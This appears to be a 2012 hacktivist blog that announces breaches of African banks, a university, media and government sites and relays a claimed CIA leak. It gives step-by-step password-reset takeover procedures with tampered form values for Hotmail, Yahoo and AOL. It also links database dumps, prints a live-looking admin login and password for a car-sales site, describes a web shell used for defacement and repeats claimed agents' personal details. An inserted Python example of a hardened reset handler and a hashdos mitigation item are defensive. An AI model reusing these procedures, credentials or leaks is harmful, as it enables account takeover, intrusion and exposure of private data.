Sunday, April 29, 2012

Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

Yesterday we reported a 0-day vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the accounts' real owners. The Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data. When they hit a password reset on a given email account, they could fiddle with the requests and input a reset of their choosing.

A Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.”

Later today, another unknown hacker reported similar vulnerabilities in Hotmail, Yahoo and AOL. Using the same Tamper Data add-on, an attacker is able to reset the password of any account remotely. This is one of the more critical vulnerabilities ever exposed, and millions of users could be affected as a result.

Below, the hacker demonstrated the vulnerabilities:

1.) Hotmail:

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the target email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete element "SendEmail_ContinueCmd"
Step 5. Change element "__V_previousForm" to "ResetOptionForm"
Step 6. Change element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and type the new password
Step 8. Start Tamper Data and add element "__V_SecretAnswerProof". The proof is not constant like the old exploit "++++"; you need a new proof every time

2.) Yahoo:

Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2. Enter the target email and enter the 6 characters you see.
Step 3. Start Tamper Data Delete
Step 4. Change element "Stage" to "fe200"
Step 5. Click O.K and type the new password
Step 6. Start Tamper Data All in Element Z

3.) AOL:

Step 1. Go to Reset Page
Step 2. Enter the target email and enter the characters you see.
Step 3. Start Tamper Data
Step 4. Change element "action" to "pwdReset"
Step 5. Change element "isSiteStateEncoded" to "false"
Step 6. Click O.K and type the new password
Step 7. Start Tamper Data All in Element rndNO
Step 8. Done

Source: The Hacker News
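All three procedures above edit form fields that tell the server which stage of the reset flow the browser has reached ("Stage", "action", "__V_previousForm"). The following is an added example, not code from the original post or from any of the providers named: a minimal reset handler, with hypothetical names throughout, that trusts such a field next to one that keeps the flow state on the server, assuming the flaw class is client-controlled flow state.

```python
import hmac
import secrets

# Hypothetical in-memory stand-in for a server-side session store.
_RESETS = {}

def start_reset(email):
    """Begin a reset: create server-side state and a one-time proof."""
    sid = secrets.token_urlsafe(16)
    proof = secrets.token_urlsafe(16)  # would be delivered out of band
    _RESETS[sid] = {"email": email, "stage": "awaiting_proof", "proof": proof}
    return sid, proof

def submit_proof(sid, proof):
    """Advance to 'proof_verified' only if the stored proof matches."""
    state = _RESETS.get(sid)
    if state is None or state["stage"] != "awaiting_proof":
        return False
    if not hmac.compare_digest(state["proof"], proof):
        _RESETS.pop(sid, None)  # one attempt per reset session
        return False
    state["stage"] = "proof_verified"
    return True

def set_password_vulnerable(form, passwords):
    """Weak form: believes whatever stage and account the request claims."""
    if form.get("stage") == "proof_verified":
        passwords[form["email"]] = form["new_password"]
        return True
    return False

def set_password_hardened(sid, form, passwords):
    """Hardened form: stage and account come only from server-side state."""
    state = _RESETS.get(sid)
    if state is None or state["stage"] != "proof_verified":
        return False
    passwords[state["email"]] = form["new_password"]
    del _RESETS[sid]  # the verified session is single use
    return True
```

In the hardened handler, any stage or email value present in the submitted form is simply never read, so editing it in transit changes nothing.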

Saturday, April 28, 2012

Garmin South Africa Hacked by Rwandan Hackers

Rwandan Hackers hacked into a high-profile website, Garmin Southern Africa (garmin.co.za).
Garmin is the world leader in Global Positioning System (GPS) technology and an innovator in consumer lifestyle electronics.
We published more than 100 accounts that have been stolen: username, password, email and cellphone.
DATABASE LINK: http://pastebin.com/fuva0Lai
Account hacked

www.autotrader.co.tz database compromised

                                               ADMIN PANEL OF AUTOTRADER
Rwandan Hackers published information on the server on which the site is hosted, the database’s structure, along with the usernames and passwords of 498 users of Autotrader Tanzania.
DATABASE INFO: http://pastebin.com/x4AVEA5k
admin login: http://www.autotrader.co.tz/admin/
username: admin
password: 0163783644

Friday, April 20, 2012

Makerere University Hacked by Rwandan Hacker

The websites hacked are:
http://zoology.mak.ac.ug (Makerere University Department of Zoology)
http://www.sportsscience.mak.ac.ug (Makerere University Department of Sports Science)
We found a SQL injection in a web page. Using the vulnerability, an attacker can exploit the entire database and gain illegal access.

Makerere University (MAK), Uganda's largest and second-oldest higher institution of learning, (the oldest is Katigondo National Major Seminary in Masaka District, which was established in 1911), was first established as a technical school in 1922. In 1963 it became the University of East Africa, offering courses leading to general degrees from the University of London. It became an independent national university in 1970 when the University of East Africa was split into three independent universities: University of Nairobi (Kenya), University of Dar es Salaam (Tanzania) and Makerere University. Today, Makerere University has 22 faculties, institutes and schools offering programmes for about 30,000 undergraduates and 3,000 postgraduates.

Makerere was home to many post-independence African leaders, including former Ugandan president Milton Obote and late Tanzanian president Julius Nyerere. Former Tanzanian president Benjamin Mkapa and current Kenyan president Mwai Kibaki are also Makerere alumni.

In the years immediately after Uganda's independence, Makerere University was a focal point for the literary activity that was central to African nationalist culture. Some prominent writers, including Nuruddin Farah, Ali Mazrui, David Rubadiri, Okello Oculi, Ngũgĩ wa Thiong'o, John Ruganda, Paul Theroux, V. S. Naipaul and Peter Nazareth, were at Makerere University at one point in their writing and academic careers.

In September 2011, the university announced that it would close indefinitely following a week-long strike by the lecturers, who refused to resume work until their demands were met.

Database of  Makerere University Department Of Zoology
-http://pastebin.com/WCghhaKx
Database of Makerere University Department Of Sports Science
-http://pastebin.com/S8uQVnPq

Tuesday, April 17, 2012

Fidelity Bank hacked by Rwandan Hackers


Fidelity Bank hacked by Rwandan hackers. The database has been hacked and exposed in a pastebin note. Fidelity Bank is a commercial bank in Ghana which was issued with its Universal Banking License on June 28th 2006, making it the 22nd bank to be licensed by the Bank of Ghana. It is one of the twenty-seven (27) licensed commercial banks in the country.

The Bank is owned by Ghanaian and foreign individual and institutional investors including ADB and SSNIT, and also by its executives.

DATABASE LINK: http://pastebin.com/Hbvq0UrU

TV3 Network Limited (TV3 Ghana) again hacked by Rwandan Hackers

TV3 database compromised by Rwandan hackers. TV3 Network Limited (TV3 Ghana) is a private, free-to-air television broadcaster in Ghana. Launched in 1997, TV3 Ghana airs and produces a variety of television programmes including acclaimed news bulletins, dramas and successful reality television and entertainment shows.
TV3 Ghana established itself as the most watched free-to-air television station in Ghana, having achieved 65% nationwide penetration at end-2006 and aiming to reach 90% by 2008.
DATABASE LINK : http://pastebin.com/G6gNcxYL

www.combanketh.com database compromised

www.combanketh.com hacked by Rwandan hackers. We found a SQL injection in www.combanketh.com.
We also posted the database in a pastebin note. The Commercial Bank of Ethiopia (CBE) is the largest commercial bank in Ethiopia and had about Birr 73.7 billion (US$4.45 billion) in assets at the end of June 2010. At the time, the bank held approximately 63.5% of deposits and about 38% of all bank loans in the country. The bank has about 9,000 employees who staff the headquarters and 301 branches positioned in the main cities and regional towns, including 45 branches in Addis Ababa. CBE recently opened new branches in the remote towns of Injibara and Humera.
Database Link: http://pastebin.com/cuRHsrPW

victoria bank hacked by Rwandan Hackers #OPKENYANBANK

Victoria Commercial Bank hacked by Rwandan hackers.
Victoria Commercial Bank (VCB) is a Private Bank in Kenya. It is one of the forty-four (44) licensed commercial banks in the country.
The bank is a Tier 3 Private Bank in Kenya, East Africa's largest economy. VCB focuses on serving large corporations and high net-worth clients. The bank also offers personal banking services to the employees of its corporate clients. As of December 2010, VCB was ranked number thirty-three (33), by assets, out of forty-three (43) licensed commercial banks in Kenya.
In the 2010 Banking survey (Financials 2009) the bank was positioned No. 1 in terms of performance in the small banks category and 7th overall out of all the banks in Kenya.
Database leaked in a pastebin note, link: http://pastebin.com/8gf1q4Ln


                                                   IT WAS #OPKENYANBANK

Saturday, April 14, 2012

CIA hacked !!!


An unnamed hacker using the code name "CyberZeist" has revealed some classified information regarding the official website of the Central Intelligence Agency (CIA). He also exposed server details, DNS information, the administrator login panel and so on. All of it was made available to the public in an open pastebin release, which also contains certain information about five undercover CIA agents, including real name, age, full postal address, banking details, credit card information, email ID and passwords. According to the hacker's release, the main aim of this breach is to stand against online censorship. The hacker also threatened to leak more details. It's hard to say whether the exposed data is legitimate or not. The CIA has so far remained silent about this breach. As a reminder, this is not the first time: earlier, in 2011 and 2012, the CIA fell victim to cyber attacks. In 2011 LulzSec hit the CIA and SOCA with a massive DDoS attack, which immediately sent the website offline for a certain period of time. This year, in its #Friday rampage, the hacker collective Anonymous also targeted the CIA again with a DDoS attack.


Here are some Leaked Accounts of some CIA Field Agents(stationed at Virginia), Documents, and website infos of - https://cia.gov

To CIA - Where is your security gals ;)



----------------------------------------------------------------------------------

website - https://www.cia.gov/
Location - Virginia - Reston

WebSite Last Updated -     Mon, 09 Apr 2012 16:53:44 GMT (At time of exploitation)


--------------------------------------DETAILS--------------------------------------


[ localityName=Mclean
stateOrProvinceName=Virginia
countryName=US
serialNumber=Government Entity
businessCategory=Government Entity
1.3.6.1.4.1.311.60.2.1.3=US ]

Website SSL serial Number - 1B6E90CFD3E033B37EA656F068ECB80F(Registered to Jason Robert, cia-intercom chief) using SSL v3.0[non updated]

Server IP - 156.154.70.10 (apache)

Lookup for A records of cia.gov
Host - cia.gov.
TTl - 14400
A answer- 198.81.129.107

Site Etag : 890e-4bd41d95b3600

Admin Login Handle - ucia-gw.customer.alter.net (157.130.59.190)


........ SOme more details will be leaked soon, CIA Beware!

  -CyberZeist (Against Online Censorship)

Wednesday, April 11, 2012

Web is vulnerable to hashing denial-of-service attack ( #hashdos ) with Demo

Researchers have shown how a flaw that is common to most popular Web programming languages can be used to launch denial-of-service attacks by exploiting hash tables, as reported by Jon from Ars Technica. The researchers presented information on a long-standing vulnerability in most web application frameworks at the 28th Chaos Communication Congress security conference in Berlin, Germany, Earth, Milky Way. Alexander “alech” Klink and Julian “zeri” Wälde delivered a demonstration and lecture titled "Efficient Denial of Service Attacks on Web Application Platforms". In their lecture they explained in detail how most web programming languages utilize hashes and manage collisions.

The flaw affects a long list of technologies, including PHP, ASP.NET, Java, Python, Ruby, Apache Tomcat, Apache Geronimo, Jetty, and Glassfish, as well as Google's open source JavaScript engine V8. The vendors and developers behind these technologies are working to close the vulnerability, with Microsoft warning of "imminent public release of exploit code" for what is known as a hash collision attack.

Klink and Wälde showed that "PHP 5, Java, ASP.NET as well as V8 are fully vulnerable to this issue and PHP 4, Python and Ruby are partially vulnerable, depending on version or whether the server running the code is a 32-bit or 64-bit machine."

"This attack is mostly independent of the underlying Web application and just relies on a common fact of how Web application servers typically work," the team wrote, noting that such attacks would force Web application servers to use 99% of CPU for several minutes to hours for a single HTTP request. "Hash tables are a commonly used data structure in most programming languages," they explained. "Web application servers or platforms commonly parse attacker-controlled POST form data into hash tables automatically, so that they can be accessed by application developers. If the language does not provide a randomized hash function or the application server does not recognize attacks using multi-collisions, an attacker can degenerate the hash table by sending lots of colliding keys. The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request."

Microsoft has released a workaround for an ASP.NET vulnerability to help protect Websites against potential denial-of-service (DoS) attacks, according to a security advisory.

The vulnerability is considered serious because an attacker could take down a site by consuming all CPU resources on a Web server, or cluster of servers, using a series of specially crafted, 100KB HTTP requests. Just one such request could consume 100 percent of one CPU core for between 90 and 110 seconds.

"An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or cluster of servers," Suha and Jonathan Ness, engineers with Microsoft Security Response Center said. Microsoft was unaware of any DoS attacks exploiting the vulnerability. Nevertheless, Microsoft decided to release a workaround, because detailed information on the flaw is publicly available.

Andrew Storms, director of security operations for nCircle said: "This isn’t your average DoS attack because it doesn’t take a botnet or a lot of coordination to take a web server down. Most DoS attacks rely on a huge number of small requests targeted at a specific web server to overwhelm it. In this case, a single request can consume a single core for 90 seconds. Queue up a few of these requests every few minutes and the site will be essentially knocked offline."

Demonstration
You can download the video demo from here; the hash collisions in POST denial-of-service exploit online demo and the script source code are here.

Available Countermeasures:
1.) Limiting the number of different HTTP request parameters (PHP, Tomcat): PHP has added a new configuration variable, max_input_vars, that can limit the number of parameters. This is similar to limiting the request length, except that what is limited is not the total length of the request but the number of different parameters that can be submitted in a single request.
2.) Limiting HTTP POST and GET request lengths (Microsoft ASP.NET): Microsoft suggests limiting the HTTP request length. Most applications don’t require very long HTTP requests, except for file uploads.


    <configuration>
      <system.web>
        <httpRuntime maxRequestLength="200"/>
      </system.web>
    </configuration>

As long as you don’t process data in a hash table from any other sources, except from the HTTP request (like external URLs), this should prevent the basic form of the attack.

Also, oCERT has a good summary about affected and fixed software versions, and there is an advisory on Full Disclosure that describes the attack in det

SOURCE: www.thehackernews.com

Socabu Burundi hacked by Rwandan Hackers

                                                   ADMIN PANEL OF SOCABU

Socabu Burundi got hacked by Rwandan hackers. We found a SQL injection vulnerability. Using the vulnerability, an attacker can exploit the entire database and gain illegal access.
The database has been hacked and exposed in a pastebin note, link: http://pastebin.com/BQ11GTZa

Saturday, April 7, 2012

www.coalworld.net hacked by Rwandan Hackers #OPRWANDANGENOCIDE

www.coalworld.net has been hacked by Rwandan hackers.
We use "jsp Webfolder Managment", a new shell and deface upload exploit, and
our message was: don't forget that in April 1994 million of Tutsis lost their lives in genocide and the international community cowardly denied them support.
Website hacked: http://www.coalworld.net/111.jsp

www.gov.rw vulnerable to Cross-site scripting

Rwandan hackers discovered a cross-site scripting vulnerability in www.gov.rw.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications (such as web browsers through breaches of browser security) that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
Several websites are vulnerable:
www.inyarwanda.com
www.paulkagame.com
www.igihe.com